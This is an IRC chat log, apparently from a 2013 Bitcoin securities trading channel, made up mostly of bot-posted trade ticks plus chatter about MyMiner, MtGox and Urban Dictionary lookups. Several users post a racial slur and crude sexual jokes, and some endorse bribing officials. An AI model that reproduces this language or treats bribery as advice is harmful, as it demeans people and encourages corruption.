[LABCOIN] 11 @ 0.003401 = 0.0374 BTC [-] Aug 25 18:33:23 [BTCTC] [LABCOIN] 60 @ 0.0034 = 0.204 BTC [-] Aug 25 18:34:46 [BTCTC] [LABCOIN] 75 @ 0.003509 = 0.2632 BTC [+] Aug 25 18:34:47 [BTCTC] [LABCOIN] 25 @ 0.00351 = 0.0878 BTC [+] Aug 25 18:35:27 [BTCTC] [LABCOIN] 10 @ 0.003356 = 0.0336 BTC [-] Aug 25 18:36:37 [BTCTC] [LABCOIN] 10 @ 0.003355 = 0.0336 BTC [-] Aug 25 18:36:38 [BTCTC] [LABCOIN] 3450 @ 0.003355 = 11.5748 BTC [-] Aug 25 18:37:14 [BTCTC] [LABCOIN] 75 @ 0.003357 = 0.2518 BTC [+] Aug 25 18:37:16 [BTCTC] [LABCOIN] 114 @ 0.003354 = 0.3824 BTC [-] Aug 25 18:37:18 [BTCTC] [LABCOIN] 1886 @ 0.003354 = 6.3256 BTC [-] Aug 25 18:37:19 [BTCTC] [LABCOIN] 500 @ 0.003352 = 1.676 BTC [-] Aug 25 18:37:21 [BTCTC] [LABCOIN] 200 @ 0.003331 = 0.6662 BTC [-] Aug 25 18:37:22 [BTCTC] [LABCOIN] 333 @ 0.00333 = 1.1089 BTC [-] Aug 25 18:37:23 [BTCTC] [LABCOIN] 500 @ 0.00333 = 1.665 BTC [-] Aug 25 18:37:24 [BTCTC] [LABCOIN] 70 @ 0.00333 = 0.2331 BTC [-] Aug 25 18:37:25 [BTCTC] [LABCOIN] 50 @ 0.003311 = 0.1656 BTC [-] Aug 25 18:37:26 [BTCTC] [LABCOIN] 2000 @ 0.003305 = 6.61 BTC [-] Aug 25 18:37:28 [BTCTC] [LABCOIN] 5000 @ 0.003302 = 16.51 BTC [-] Aug 25 18:37:29 [BTCTC] [LABCOIN] 1000 @ 0.0033 = 3.3 BTC [-] Aug 25 18:37:29 [BTCTC] [LABCOIN] 5000 @ 0.0033 = 16.5 BTC [-] Aug 25 18:37:30 [BTCTC] [LABCOIN] 29 @ 0.0033 = 0.0957 BTC [-] Aug 25 18:37:31 [BTCTC] [LABCOIN] 100 @ 0.003222 = 0.3222 BTC [-] Aug 25 18:37:32 [BTCTC] [LABCOIN] 1000 @ 0.003221 = 3.221 BTC [-] Aug 25 18:37:33 [BTCTC] [LABCOIN] 10600 @ 0.003221 = 34.1426 BTC [-] Aug 25 18:37:34 [BTCTC] [LABCOIN] 10000 @ 0.00322 = 32.2 BTC [-] Aug 25 18:37:35 [BTCTC] [LABCOIN] 3200 @ 0.003218 = 10.2976 BTC [-] Aug 25 18:37:36 [BTCTC] [LABCOIN] 100 @ 0.003217 = 0.3217 BTC [-] Aug 25 18:37:37 [BTCTC] [LABCOIN] 5 @ 0.00321 = 0.0161 BTC [-] Aug 25 18:37:38 [BTCTC] [LABCOIN] 1300 @ 0.00321 = 4.173 BTC [-] Aug 25 18:37:39 [BTCTC] [LABCOIN] 1800 @ 0.003203 = 5.7654 BTC [-] Aug 25 18:37:40 [BTCTC] [LABCOIN] 100 @ 0.003202 = 0.3202 BTC [-] Aug 25 18:37:41 [BTCTC] [LABCOIN] 70 @ 0.003202 = 0.2241 BTC [-] Aug 25 18:37:42 [BTCTC] [LABCOIN] 85 @ 0.003509 = 0.2983 BTC [+] Aug 25 18:37:43 [BTCTC] [LABCOIN] 27 @ 0.00351 = 0.0948 BTC [+] Aug 25 18:37:44 [BTCTC] [LABCOIN] 20 @ 0.003548 = 0.071 BTC [+] Aug 25 18:37:45 [BTCTC] [LABCOIN] 85 @ 0.00355 = 0.3018 BTC [+] Aug 25 18:37:46 [BTCTC] [LABCOIN] 3583 @ 0.003647 = 13.0672 BTC [+] Aug 25 18:37:48 [BTCTC] [LABCOIN] 2 @ 0.003647 = 0.0073 BTC [+] Aug 25 18:38:34 [BTCTC] [LABCOIN] 10 @ 0.003647 = 0.0365 BTC [+] Aug 25 18:38:51 [BTCTC] [ASICMINER-PT] 1 @ 2.569 BTC [+] Aug 25 18:38:51 [BTCTC] [LABCOIN] 188 @ 0.003647 = 0.6856 BTC [+] Aug 25 18:38:52 [BTCTC] [ASICMINER-PT] 2 @ 2.57 = 5.14 BTC [+] Aug 25 18:38:53 [BTCTC] [ASICMINER-PT] 4 @ 2.6 = 10.4 BTC [+] Aug 25 18:38:54 [BTCTC] [ASICMINER-PT] 6 @ 2.623 = 15.738 BTC [+] Aug 25 18:38:56 [BTCTC] [ASICMINER-PT] 1 @ 2.639 BTC [+] Aug 25 18:38:57 [BTCTC] [ASICMINER-PT] 4 @ 2.644 = 10.576 BTC [+] Aug 25 18:38:58 [BTCTC] [ASICMINER-PT] 1 @ 2.648 BTC [+] Aug 25 18:38:59 [BTCTC] [ASICMINER-PT] 1 @ 2.68 BTC [+] Aug 25 18:39:00 [BTCTC] [ASICMINER-PT] 10 @ 2.68 = 26.8 BTC [+] Aug 25 18:39:01 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [+] Aug 25 18:39:01 [BTCTC] [ASICMINER-PT] 1 @ 2.697 BTC [+] Aug 25 18:39:02 [BTCTC] [ASICMINER-PT] 1 @ 2.698 BTC [+] Aug 25 18:39:03 hehe lol Aug 25 18:39:03 [BTCTC] [ASICMINER-PT] 3 @ 2.698 = 8.094 BTC [+] Aug 25 18:39:04 [BTCTC] [ASICMINER-PT] 4 @ 2.7 = 10.8 BTC [+] Aug 25 18:39:05 [BTCTC] [ASICMINER-PT] 14 @ 2.7 = 37.8 BTC [+] Aug 25 18:39:21 [BTCTC] [LABCOIN] 4 @ 0.003308 = 0.0132 BTC [-] Aug 25 18:39:58 https://hashfast.com/miner-protection-program/ Aug 25 18:41:11 [BTCTC] [LABCOIN] 48 @ 0.003499 = 0.168 BTC [+] Aug 25 18:41:14 [BTCTC] [TAT.ASICMINER] 67 @ 0.02565 = 1.7186 BTC [-] Aug 25 18:42:20 they ship chips or actual devices? Aug 25 18:43:27 phear the lord of network difficulty Aug 25 18:44:46 not sure, but i think they only ship chips. it's a bit misleading on the website Aug 25 18:45:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0257 = 0.0771 BTC [+] Aug 25 18:45:25 [BTCTC] [TAT.ASICMINER] 99 @ 0.02578 = 2.5522 BTC [+] Aug 25 18:45:44 [BTCTC] [TAT.ASICMINER] 30 @ 0.02579 = 0.7737 BTC [+] Aug 25 18:46:00 it's a decent gesture, but some projecting would be required to see how nice it really is Aug 25 18:46:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.0258 BTC [+] Aug 25 18:47:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.02635 = 0.1054 BTC [+] Aug 25 18:53:14 [BTCTC] [TAT.ASICMINER] 5 @ 0.02634 = 0.1317 BTC [-] Aug 25 18:54:40 [BTCTC] [ASICMINER-PT] 1 @ 2.698 BTC [-] Aug 25 18:54:41 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [+] Aug 25 18:55:09 [BTCTC] [LABCOIN] 85 @ 0.003407 = 0.2896 BTC [-] Aug 25 18:55:10 [BTCTC] [LABCOIN] 20 @ 0.003406 = 0.0681 BTC [-] Aug 25 18:55:12 [BTCTC] [LABCOIN] 23 @ 0.003404 = 0.0783 BTC [-] Aug 25 18:55:13 [BTCTC] [LABCOIN] 9872 @ 0.0034 = 33.5648 BTC [-] Aug 25 18:55:48 [BTCTC] [DMS.SELLING] 100 @ 0.01711 = 1.711 BTC [-] Aug 25 18:58:05 [HAVELOCK] [SMG] 18 @ 0.00023 = 0.0041 BTC [+] Aug 25 18:58:12 [BTCTC] [TAT.ASICMINER] 5 @ 0.02633 = 0.1317 BTC [-] Aug 25 18:58:38 [BTCTC] [TAT.ASICMINER] 58 @ 0.02633 = 1.5271 BTC [-] Aug 25 18:58:41 [MPEX] [S.MG] 5800 @ 0.000235 = 1.363 BTC [+] Aug 25 19:00:22 http://finance.yahoo.com/echarts?s=F5R.DE+Interactive#symbol=f5r.de;range=6m mid july was the announcement of the partnership with bitcoin.de Aug 25 19:00:24 FIDOR BANK Stock Chart | F5R.DE Interactive Chart - Yahoo Finance Aug 25 19:01:18 http://finance.yahoo.com/news/bitcoin-fidor-bank-ag-agree-125300653.html Aug 25 19:01:21 Bitcoin.de and Fidor Bank AG Agree on Large-Scale Partnership - Yahoo Finance Aug 25 19:05:54 bye bye assbot Aug 25 19:07:51 damn Aug 25 19:08:39 12:07 (B) 1 @ 2.74800000 ASICMINER-PT Aug 25 19:08:48 just a fyi Aug 25 19:08:59 :D Aug 25 19:10:07 [BTCTC] [TAT.ASICMINER] 200 @ 0.0455 = 9.1 BTC [+] Aug 25 19:10:08 [BTCTC] [TAT.ASICMINER] 200 @ 0.0455 = 9.1 BTC [+] Aug 25 19:10:09 [BTCTC] [TAT.ASICMINER] 200 @ 0.0455 = 9.1 BTC [+] Aug 25 19:11:56 sorry no cookie for you Aug 25 19:12:57 :( Aug 25 19:38:22 >try to configure 2FA on BTCT Aug 25 19:38:24 >fail Aug 25 19:38:29 >lose BTC Aug 25 19:40:39 ;;calc 0.02078 - 0.002666 Aug 25 19:40:39 0.018114 Aug 25 19:41:26 ;;calc .01329 + 0.00418048 Aug 25 19:41:26 0.01747048 Aug 25 19:41:30 bah Aug 25 19:41:35 .d Aug 25 19:41:36 65750060.14908 | Next Diff in 1848 blocks | Estimated Change: 4.4819% in 12d 6h 9m 39s Aug 25 19:41:41 these fuckers Aug 25 19:47:17 assbot missing a lot of action Aug 25 19:47:32 AM gone wild Aug 25 19:48:11 yup Aug 25 19:48:22 kakobrekla fix it Aug 25 19:48:50 prolly needs to aggregate information, to prevent flood Aug 25 19:48:57 dunno if kako has time for that Aug 25 19:49:31 AM going up on unimportant news Aug 25 19:49:47 while the "we have low dividends because of gen2 chips" gets ignored somehow Aug 25 20:11:14 http://files.abovetopsecret.com/files/img/mm52189bd8.jpg Aug 25 20:12:04 pankkake ppl try to pump because well... the perception of wealth depends on pumping. Aug 25 20:19:29 "Collecting funds from public is still illegal in China. We used to think that IPO with BTC can avoid this legal risk. However, it turns to be wrong after we consulted with several layers." Aug 25 20:19:41 Myminer has backed out because of legal issues in China and is now taking back all shares in return for the IPO price Aug 25 20:19:52 wasnt really following myminer Aug 25 20:19:56 Poor China. Aug 25 20:20:00 but figured some would enjoy the info Aug 25 20:20:14 I saw the "closed" sign on the doors. :) Aug 25 20:20:34 the doors to China? Aug 25 20:20:50 Haha. The doors to MyMiner. Aug 25 20:21:11 http://a2.ec-images.myspacecdn.com/profile01/127/f2e4c928ec144c029219868e8ef2c9f3/p.jpg Aug 25 20:21:35 perhaps this explains asicminer's reluctance to do a proper offering. Aug 25 20:22:37 Looks like they went the way of BTCGarden. ;) I think the best idea out of a Chinese operation would be bribing the high level operators with dividends to get them to look the other way. Basically an unofficial partnering with the proper government official. Aug 25 20:24:02 yes, bribery is always a good path Aug 25 20:24:16 When in Rome... Aug 25 20:24:24 when in Mexico Aug 25 20:25:06 Whoa. Mystery key combo closed out HexChat. Aug 25 20:25:21 What's the punchline to "When in Mexico"? Aug 25 20:25:51 mexico is well known for having bribable authorities Aug 25 20:25:58 Oh. Absolutely. Aug 25 20:26:31 Lots of African nations as well. When I was in Burkina Faso it was just considered a tax to get a judge to even give you the time of day. Aug 25 20:26:42 Especially if you were white. Aug 25 20:41:10 20:38 (B) 48 @ 3.00000000 ASICMINER-PT Aug 25 20:43:13 just released MPEx.rb 0.6.0 (https://github.com/fawuxi/mpex#mpexrb-a-commandline-client-for-mpex) Aug 25 20:44:01 ThickAsThieves: that might interest you, since its 'portfolio' command does what you asked for a day or two ago Aug 25 20:46:15 o hey cool. Aug 25 20:48:23 had this ready for quite a few months using it myself, thought might as well release it if someone else might have a use for this 'portfolio' convenience command Aug 25 20:54:44 hey thanks! i'll have my techy guy take a look Aug 25 20:55:12 currently running thru a terminal on ruby i think too Aug 25 20:56:24 it says i'm using "MPEx commandline interface 0.5.0 (c) 2013 Fa Wuxi" Aug 25 20:56:31 that you? Aug 25 20:56:34 ThickAsThieves: yes Aug 25 20:56:37 :) Aug 25 20:56:44 ThickAsThieves: so you're using an older version already Aug 25 21:46:16 kakobrekla http://trilema.com/2013/the-positive-market-effects-of-the-delivery-bet/ Aug 25 22:05:58 this is a pretty good quote: At least those were done by unsympathetic white folk, rather than by absolute worms who also happen to have been born black, but instead chose to live their lives as niggers. Aug 25 22:07:02 twain ? Aug 25 22:07:11 why AM are expending any effort on these stupid usb miners is beyond me Aug 25 22:07:27 surely the idiots run out at some point? Aug 25 22:07:35 dub people get to be involved. why so mean ? Aug 25 22:08:04 do they really? Aug 25 22:08:37 I can't see it distributing blockchain security in any meaningful way Aug 25 22:09:06 no you Aug 25 22:09:10 err Aug 25 22:09:12 no u mircea_popescu Aug 25 22:09:13 if the difficulty levels out, and btc goes to $10K, these little USB miners might still be worth gold Aug 25 22:09:16 you wrote that quote Aug 25 22:09:57 Fried Chicken and Collard Greens Aug 25 22:10:05 and the difficulty will level out before the universe runs out of entropy :p Aug 25 22:13:03 anyways.. n/m :p Aug 25 22:13:10 So BFL is dead? Aug 25 22:13:30 Should we hire an ocean's 11 crew to rob them, robbin' hoods style? Aug 25 22:17:02 dub yeah, imo the usb miners are the best thing am did. Aug 25 22:17:16 you may one day come up with a court order taking any alrge miner out of business Aug 25 22:17:21 good luck getting rid of the little shits. Aug 25 22:18:31 the girls like them too Aug 25 22:18:35 i think Aug 25 22:19:11 i think their cool Aug 25 22:20:18 girls are in bitcoin? Aug 25 22:20:46 well they are into Porche's :) Aug 25 22:21:10 eww german cars Aug 25 22:23:05 thestringpuller: http://www.reddit.com/r/girlsgonebitcoin Aug 25 22:25:19 that's why I asked if there was a pink one Aug 25 22:25:55 blue for boys and pink for girls Aug 25 22:27:00 and black for your local private military contractor Aug 25 22:28:48 erm Aug 25 22:28:57 n/m Aug 25 22:32:01 and silver for crazy lizards Aug 25 22:32:24 :) Aug 25 22:32:27 that's correct. Aug 25 22:37:49 when does the white version come out Aug 25 22:38:39 http://www.reddit.com/r/Bitcoin/comments/1l2kj3/the_positive_market_effects_of_the_delivery_bet/ Aug 25 22:38:43 pls to redditize. Aug 25 22:38:44 The positive market effects of the delivery bet. : Bitcoin Aug 25 22:53:04 redditized Aug 25 22:54:04 ty Aug 25 23:02:09 http://www.reddit.com/r/Bitcoin/comments/1l25b5/petition_for_mtgox_to_post_status_on_their/ like that would ever happen Aug 25 23:02:11 Petition for MtGox to post status on their solvency : Bitcoin Aug 25 23:02:43 lol Aug 25 23:02:46 "status" wtf would that do. Aug 25 23:02:53 are they gonna say "sry we're insolvent" in any casE ? Aug 25 23:03:07 sounds like an invitation to eat more Gox BS Aug 25 23:04:11 well Aug 25 23:04:14 they're not insolvent Aug 25 23:04:22 even if they cant use their $2.9m of stolen money Aug 25 23:04:30 thats still an asset on the books Aug 25 23:04:43 what 2.9mn is that ? Aug 25 23:04:59 lol you know it's bad when one has to ask which stolen pile of dough we're discussing Aug 25 23:05:06 wait, theres more than one? Aug 25 23:05:23 ffs, this is why we invented bitcoin Aug 25 23:05:28 myeah Aug 25 23:05:30 so the government would have to go through legal channels to get shit done Aug 25 23:05:49 5mil+ total Aug 25 23:06:00 goddamnitsomuch Aug 25 23:06:15 yea it's bad... Aug 25 23:06:36 so why has no one crushed coinbase yet Aug 25 23:07:02 30day kyc, they're doing it all strictly by the book Aug 25 23:11:02 jurov it was ping timeout not excess flood Aug 25 23:11:24 dunno whats been going on for last few days, looks like some freenode issue to me Aug 25 23:12:11 Duffer1: mtgox was doing it by the book too Aug 25 23:12:13 all the papers and shit Aug 25 23:13:27 their US subsidiary mutum siggglim (somethinerother) failed to register as a proper money transmitter in the u.s. Aug 25 23:14:16 yeah, which they're saying they did Aug 25 23:14:30 problem is there is liars on both sides so I dont know who to believe Aug 25 23:14:35 oh i hadn't heard that Aug 25 23:14:36 [BTCTC] [DMS.MINING] 3 @ 0.00333 = 0.01 BTC [-] Aug 25 23:14:37 [BTCTC] [DMS.MINING] 16 @ 0.00331 = 0.053 BTC [-] Aug 25 23:14:38 [BTCTC] [DMS.PURCHASE] 2 @ 0.01606 = 0.0321 BTC [+] Aug 25 23:16:03 [BTCTC] [NASTY-PT] 1 @ 0.002279 BTC [-] Aug 25 23:17:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001135 BTC [+] Aug 25 23:18:53 [MPEX] [S.MPOE] 6452 @ 0.0008535 = 5.5068 BTC [+] Aug 25 23:18:54 [MPEX] [S.MPOE] 14248 @ 0.00085434 = 12.1726 BTC [+] Aug 25 23:19:17 Duffer1 yes they had ~10mn usd confiscated by us govt Aug 25 23:19:24 on top of undisclosed sums confiscated by dwolla. Aug 25 23:19:43 that's gotta hurt hehe Aug 25 23:20:20 [BTCTC] [DMS.MINING] 2 @ 0.0034 = 0.0068 BTC [+] Aug 25 23:23:13 20:46.19 ( mircea_popescu ) kakobrekla http://trilema.com/2013/the-positive-market-effects-of-the-delivery-bet/ Aug 25 23:23:14 cool read Aug 25 23:24:06 [BTCTC] [DMS.SELLING] 30 @ 0.01251 = 0.3753 BTC [-] Aug 25 23:24:24 [BTCTC] [ACTIVEMINING] 17 @ 0.005379 = 0.0914 BTC [+] Aug 25 23:24:25 [BTCTC] [ACTIVEMINING] 68 @ 0.00538 = 0.3658 BTC [+] Aug 25 23:24:26 [BTCTC] [ACTIVEMINING] 180 @ 0.005428 = 0.977 BTC [+] Aug 25 23:24:51 [BTCTC] [DMS.MINING] 9 @ 0.0034 = 0.0306 BTC [+] Aug 25 23:25:09 [BTCTC] [DMS.SELLING] 49 @ 0.01251 = 0.613 BTC [-] Aug 25 23:25:11 [BTCTC] [DMS.SELLING] 360 @ 0.0125 = 4.5 BTC [-] Aug 25 23:25:35 [BTCTC] [DMS.SELLING] 5 @ 0.0129 = 0.0645 BTC [+] Aug 25 23:25:56 [HAVELOCK] [SMG] 2 @ 0.000235 = 0.0005 BTC [+] Aug 25 23:27:18 [BTCTC] [DMS.PURCHASE] 3 @ 0.01606 = 0.0482 BTC [+] Aug 25 23:28:02 [BTCTC] [LABCOIN] 85 @ 0.003447 = 0.293 BTC [+] Aug 25 23:30:15 [BTCTC] [LABCOIN] 24 @ 0.003448 = 0.0828 BTC [+] Aug 25 23:30:22 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [+] Aug 25 23:32:01 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001135 = 0.0023 BTC [+] Aug 25 23:34:24 [BTCTC] [LABCOIN] 2015 @ 0.003447 = 6.9457 BTC [-] Aug 25 23:34:47 [BTCTC] [LABCOIN] 9 @ 0.003448 = 0.031 BTC [+] Aug 25 23:34:48 [BTCTC] [LABCOIN] 100 @ 0.003448 = 0.3448 BTC [+] Aug 25 23:34:50 [BTCTC] [LABCOIN] 2500 @ 0.00345 = 8.625 BTC [+] Aug 25 23:35:36 [BTCTC] [LABCOIN] 15 @ 0.003447 = 0.0517 BTC [-] Aug 25 23:37:06 hi Aug 25 23:37:38 [BTCTC] [DMS.SELLING] 38 @ 0.0129 = 0.4902 BTC [+] Aug 25 23:38:33 [BTCTC] [DMS.SELLING] 182 @ 0.01297 = 2.3605 BTC [+] Aug 25 23:38:50 [HAVELOCK] [CFIG] 1 @ 0.139 BTC [+] Aug 25 23:39:58 [BTCTC] [ACTIVEMINING] 50 @ 0.005385 = 0.2693 BTC [-] Aug 25 23:40:13 [BTCTC] [DMS.SELLING] 156 @ 0.01299 = 2.0264 BTC [+] Aug 25 23:40:19 ello Aug 25 23:40:27 [HAVELOCK] [CFIG] 16 @ 0.144 = 2.304 BTC [+] Aug 25 23:41:32 [BTCTC] [ACTIVEMINING] 68 @ 0.005301 = 0.3605 BTC [-] Aug 25 23:41:34 [BTCTC] [ACTIVEMINING] 100 @ 0.0053 = 0.53 BTC [-] Aug 25 23:41:35 [BTCTC] [ACTIVEMINING] 50 @ 0.005214 = 0.2607 BTC [-] Aug 25 23:42:22 [BTCTC] [ACTIVEMINING] 20 @ 0.005213 = 0.1043 BTC [-] Aug 25 23:42:59 [BTCTC] [DMS.PURCHASE] 182 @ 0.01606 = 2.9229 BTC [+] Aug 25 23:43:56 [BTCTC] [ACTIVEMINING] 68 @ 0.005211 = 0.3543 BTC [-] Aug 25 23:43:58 [BTCTC] [ACTIVEMINING] 97 @ 0.00521 = 0.5054 BTC [-] Aug 25 23:44:01 [BTCTC] [DMS.PURCHASE] 6 @ 0.01606 = 0.0964 BTC [+] Aug 25 23:44:09 [BTCTC] [DMS.MINING] 40 @ 0.00343 = 0.1372 BTC [+] Aug 25 23:45:04 ;;ud nubbin Aug 25 23:45:05 http://www.urbandictionary.com/define.php?term=nubbin | Nubbin. A third Nipple. "Holy shit! you have a nubbin!!" mark as favorite buy ... Nubbin. In England, a nubbin is a clitoris. Sometimes referred to as pleasure ... Aug 25 23:45:10 Urban Dictionary: nubbin Aug 25 23:45:12 [BTCTC] [ACTIVEMINING] 1 @ 0.00538 BTC [+] Aug 25 23:45:20 [BTCTC] [DMS.MINING] 20 @ 0.00343 = 0.0686 BTC [+] Aug 25 23:45:29 lol Aug 25 23:45:36 [BTCTC] [DMS.MINING] 131 @ 0.00331 = 0.4336 BTC [-] Aug 25 23:45:46 [BTCTC] [LABCOIN] 31 @ 0.003447 = 0.1069 BTC [-] Aug 25 23:45:47 [BTCTC] [LABCOIN] 549 @ 0.003449 = 1.8935 BTC [+] Aug 25 23:45:59 haha Aug 25 23:46:08 [BTCTC] [ASICMINER-PT] 1 @ 2.831 BTC [-] Aug 25 23:47:06 clits` Aug 25 23:48:18 clits and tits! Aug 25 23:48:24 '`'`'`'`' Aug 25 23:48:34 ;;ud duffer Aug 25 23:48:34 http://www.urbandictionary.com/define.php?term=duffer | 1. duffer. a complete idiot. you are acting like a duffer dude. mark as favorite buy duffer mugs & ... Look at that duffer; he's already taken 8 strokes on the hole. Aug 25 23:48:36 Urban Dictionary: duffer Aug 25 23:48:46 :( Aug 25 23:48:47 ;;ud fluffer Aug 25 23:48:48 http://www.urbandictionary.com/define.php?term=fluffer | (noun) a person in the adult entertainment industry whose job it ... Aug 25 23:48:50 Urban Dictionary: fluffer Aug 25 23:48:54 ;;ud puller Aug 25 23:48:54 http://www.urbandictionary.com/define.php?term=puller | A more subtle way of calling someone a jerkoff/jackoff. One who pulls his pud instead of doing what he is supposed to. Aug 25 23:48:57 Urban Dictionary: puller Aug 25 23:48:58 ;;ud dub Aug 25 23:48:58 http://www.urbandictionary.com/define.php?term=dub | 1. Abbreviaton for the letter W 2. Twenty dollars 3. Twenty dollars worth of anything, especially narcotics 4. Twenty-inch rims 5. The art of makin... Aug 25 23:49:00 Urban Dictionary: dub Aug 25 23:49:06 shruhg Aug 25 23:49:09 check my dubs Aug 25 23:49:19 ;;ud mircea Aug 25 23:49:19 http://www.urbandictionary.com/define.php?term=Mircea | Pronounciation: \Mir-cha\ Function: Noun Etymology: Slavic, Romanian origin 1. A royal king from Romania "Mircea Cel Batran" 1386-1418 before Vlad ... Aug 25 23:49:21 Urban Dictionary: Mircea Aug 25 23:49:22 [BTCTC] [ASICMINER-PT] 1 @ 2.83 BTC [-] Aug 25 23:49:23 [BTCTC] [ASICMINER-PT] 1 @ 2.822 BTC [-] Aug 25 23:49:28 LOLOLOLOLOLOLOL Aug 25 23:49:31 Mir-cha? Who knew Aug 25 23:50:00 24's ridin' dubs Aug 25 23:50:08 that's how all mah niggaz roll Aug 25 23:50:44 [BTCTC] [LABCOIN] 390 @ 0.003449 = 1.3451 BTC [+] Aug 25 23:50:45 puts some d's on that bitch Aug 25 23:50:56 bah s/puts/put/ Aug 25 23:51:16 here in canadia, we call $20 worth of drugs 'a queen' Aug 25 23:51:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001135 BTC [+] Aug 25 23:51:37 RICH BOY SELLING CRACK BROKE NIGGAS WANNA JACK SHIT TIGHT JUST BOUGHT A CADILLAC (this is where you come in mod6) Aug 25 23:51:40 puts works Aug 25 23:51:56 I puts a little eggnog in ya face Aug 25 23:52:06 [BTCTC] [DMS.PURCHASE] 4 @ 0.01606 = 0.0642 BTC [+] Aug 25 23:52:09 PUT SOME D'S ON THAT BITCH Aug 25 23:52:32 when i first heard that song I didn't know the lyrics Aug 25 23:52:40 but a good buddy of mine worked with Polow the Don who produced the song Aug 25 23:52:47 [BTCTC] [DMS.MINING] 51 @ 0.0034 = 0.1734 BTC [+] Aug 25 23:52:57 so he asked me, "You know how he bought that cadillac right?" Aug 25 23:53:15 "a royal king" ? wtf, as opposed to a ducal king ? Aug 25 23:53:54 so its mir-cha not mir-sea-ya Aug 25 23:53:55 ? Aug 25 23:54:01 [BTCTC] [DMS.MINING] 37 @ 0.00343 = 0.1269 BTC [+] Aug 25 23:54:33 and pope-skew? Aug 25 23:54:37 there's certainly no s in it Aug 25 23:54:50 or pope-ess-kew Aug 25 23:55:01 from Latin regalis "of a king, kingly, royal, regal," Aug 25 23:55:01 er pop-ess-que Aug 25 23:55:02 i dunno about that /mir-chea/ notation Aug 25 23:55:06 so, y'know, a kingly king Aug 25 23:55:22 cue* Aug 25 23:55:29 it's ku Aug 25 23:56:12 po-pes-ku Aug 25 23:56:28 ;;ud popescu Aug 25 23:56:28 http://www.urbandictionary.com/define.php?term=Popescu&defid=3185158 | There are many names that ends with "escu" and they are many families with this kind of names. Ionescu, Popescu, Petrescu, Constantinescu, Basescu, Etc. Aug 25 23:56:30 Urban Dictionary: Popescu Aug 25 23:56:35 [BTCTC] [DMS.MINING] 161 @ 0.00344 = 0.5538 BTC [+] Aug 25 23:56:56 Popă (pope, parson) + -esc (-esque). "Popesque". Aug 25 23:57:00 huh. Aug 25 23:57:08 [BTCTC] [DMS.MINING] 43 @ 0.003585 = 0.1542 BTC [+] Aug 25 23:57:11 [BTCTC] [DMS.PURCHASE] 1 @ 0.01606 BTC [+] Aug 25 23:57:25 [BTCTC] [LABCOIN] 1 @ 0.003425 BTC [-] Aug 25 23:57:40 mirˈt͡ʃe̯a poˈpesku Aug 25 23:57:41 [BTCTC] [DMS.MINING] 231 @ 0.003629 = 0.8383 BTC [+] Aug 25 23:57:45 that's the ipa notation for ity Aug 25 23:57:52 oh, ok Aug 25 23:58:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001135 BTC [+] Aug 25 23:58:29 [MPEX] [S.MPOE] 8550 @ 0.00085349 = 7.2973 BTC [-] Aug 25 23:58:35 i need about tree fiddy Aug 25 23:58:46 http://en.wikipedia.org/wiki/Voiceless_palato-alveolar_affricate Aug 25 23:58:50 that being the key magic item Aug 25 23:58:52 [BTCTC] [DMS.PURCHASE] 500 @ 0.01606 = 8.03 BTC [+] Aug 25 23:58:57 you can hear it pronounced there. Aug 25 23:58:57 ;;google tree fiddy Aug 25 23:58:58 Tree Fiddy | Know Your Meme: ; 3 fiddy - YouTube: ; Tree Fiddy - YouTube: Aug 25 23:59:06 ;;ud tree fiddy Aug 25 23:59:06 http://www.urbandictionary.com/define.php?term=tree%20fiddy | Three Fifty The amount o three dollars and fifty cents. Aug 25 23:59:08 Urban Dictionary: tree fiddy Aug 25 23:59:18 [BTCTC] [TAT.MINIGAME] 1 @ 0.000269 BTC [+] Aug 25 23:59:18 so easily amused we are Aug 25 23:59:31 [BTCTC] [DMS.MINING] 265 @ 0.00363 = 0.962 BTC [+] Aug 26 00:00:20 [BTCTC] [DMS.MINING] 2 @ 0.00363 = 0.0073 BTC [+] Aug 26 00:00:44 po pesku Aug 26 00:00:49 means on the sand Aug 26 00:00:49 ;;ud thick as thieves Aug 26 00:00:50 http://www.urbandictionary.com/define.php?term=thick%20as%20thieves | A special bond people have for each other. Derived from the idea of "partners in crime". Aug 26 00:00:53 Urban Dictionary: thick as thieves Aug 26 00:00:55 [BTCTC] [BASIC-MINING] 10 @ 0.234 = 2.34 BTC [-] Aug 26 00:00:56 [BTCTC] [BASIC-MINING] 8 @ 0.2339 = 1.8712 BTC [-] Aug 26 00:00:58 [BTCTC] [BASIC-MINING] 30 @ 0.2337 = 7.011 BTC [-] Aug 26 00:01:17 yep, gotta change the name... Aug 26 00:01:23 heh Aug 26 00:01:33 just make it TAT Aug 26 00:01:43 and invent a new acronym every time someone asks you Aug 26 00:01:45 Trading As TAT Aug 26 00:01:46 [BTCTC] [BASIC-MINING] 2 @ 0.233 = 0.466 BTC [-] Aug 26 00:01:48 ooh Aug 26 00:01:59 TAT's A Trader Aug 26 00:02:16 [MPEX] [S.MPOE] 1852 @ 0.00085434 = 1.5822 BTC [+] Aug 26 00:02:17 Tactial Asset Traders Aug 26 00:02:17 [MPEX] [S.MPOE] 22371 @ 0.00085446 = 19.1151 BTC [+] Aug 26 00:02:19 [MPEX] [S.MPOE] 6027 @ 0.00085456 = 5.1504 BTC [+] Aug 26 00:02:19 Tits All Troubled Aug 26 00:02:25 Tactical* Aug 26 00:02:26 Tits and Tass Aug 26 00:02:38 you releasing any more XBOND in the near future? Aug 26 00:02:40 someone called? Aug 26 00:02:45 Terribly Absurd Taumaturgy Aug 26 00:02:58 Truth's A Tautology Aug 26 00:03:01 heh http://www.urbandictionary.com/define.php?term=Dub&defid=6155781 Aug 26 00:03:04 Totally Awesome Traders Aug 26 00:03:22 Trelatively Aselfexplanatory Tnonsense. Aug 26 00:03:36 lol Aug 26 00:03:45 yep lirl lol'd Aug 26 00:03:48 irl* Aug 26 00:04:01 [BTCTC] [BASIC-MINING] 12 @ 0.233 = 2.796 BTC [-] Aug 26 00:04:04 i wonder if ud has that Aug 26 00:04:07 irllol Aug 26 00:04:13 ;;ud irllol Aug 26 00:04:13 http://www.urbandictionary.com/define.php?term=irllol | Jan 6, 2011 ... irllol or irl lol is basically laughing out loud in real life, 